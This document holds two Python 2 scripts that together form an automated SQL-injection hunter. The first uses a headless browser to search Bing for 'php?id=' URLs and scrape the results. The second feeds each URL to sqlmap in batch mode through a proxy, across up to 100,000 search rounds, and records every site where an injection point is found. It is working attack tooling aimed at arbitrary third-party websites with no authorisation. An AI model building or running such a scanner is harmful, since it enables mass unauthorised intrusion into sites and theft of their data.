# from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
from selenium.webdriver.phantomjs.webdriver import WebDriver
from selenium.webdriver.common.keys import Keys
import time
from pyquery import PyQuery as pq
import random
import thread
import sqlmapBat
def bingSearch():
id = str(random.randint(0, 9999))
# Create a new instance of the Firefox driver
driver = WebDriver(executable_path='c:\phantomjs.exe', port=5001)
# go to the google home page
driver.get("https://cn.bing.com/")
WebDriverWait(driver, 20).until(EC.title_contains("Bing"))
time.sleep(5)
print(driver.title)
# find the element that's name attribute is q (the google search box)
inputElement = driver.find_element_by_id("sb_form_q")
inputElement.send_keys("php?id="+id)
# inputElement.send_keys("php?id=sss site:zte.com.cn inurl:sss.txt" )
searchBtn = driver.find_element_by_id("sb_form_go")
time.sleep(5)
searchBtn.click()
# inputElement.send_keys(Keys.ENTER)
time.sleep(5)
# submit the form (although google automatically searches now without submitting)
# inputElement.submit()
try:
# b_results > li.b_pag > nav > ul > li:nth-child(2) > a
# we have to wait for the page to refresh, the last thing that seems to be updated is the title
WebDriverWait(driver, 20).until(EC.title_contains("php"))
# WebDriverWait(driver,10)
print(driver.title)
print(driver.get_cookies())
doc = pq(driver.page_source)
time.sleep(3)
for index in range(1,10):
jq = "#b_results > li:nth-child(" + bytes(index) + ") > h2 > a"
it =doc(jq)
print (it.attr('href'))
bingHref = it.attr('href')
if bingHref:
thread.start_new(sqlmapBat.sqlmapInjectCheck, (it.attr('href'),))
except:
print('ssss')
pass
finally:
driver.quit()
if __name__ == "__main__":
for index in range(1,100000,1):
try:
bingSearch()
except:
pass
time.sleep(30)
# -*- coding: utf-8 -*-
import os
import time
# --proxy=http://proxynj.zte.com.cn:80
sqlInjectSuccLogFile = 'c:\\sqlInjectSuccUrl.txt'
def sqlmapInjectCheck(url):
logName = 'c:\log_' + '_' + str(int(time.time())) + '.txt'
# --flush - session
try:
cmd = 'C:\Python27\python.exe C:\Python27\sqlmap\sqlmap.py --random-agent --proxy=http://proxynj.zte.com.cn:80 --batch --dbms=mysql ' + '-u ' + url + '| c:\\tee.exe ' + logName
os.system(cmd)
result = checkSqlInResult(logName)
if result == 'succ':
writeInjectPointUrlToSuccLog(url)
except:
pass
def writeInjectPointUrlToSuccLog(url):
with open(sqlInjectSuccLogFile, 'a+') as file_to_read:
file_to_read.write(url + '\r\n')
def checkSqlInResult(filename):
injectSuccStr = 'the following injection point'
with open(filename, 'r') as file_to_read:
file_context =file_to_read.read()
xx=0
if file_context.find(injectSuccStr) != -1:
return 'succ'
return ''
if __name__ == "__main__":
pass
# sqlmapInjectCheck('https://www.sjq.cn/article.php?id=2')
# sqlmapInjectCheckAndAnaResult('http://10.42.43.10/low.php?id=1')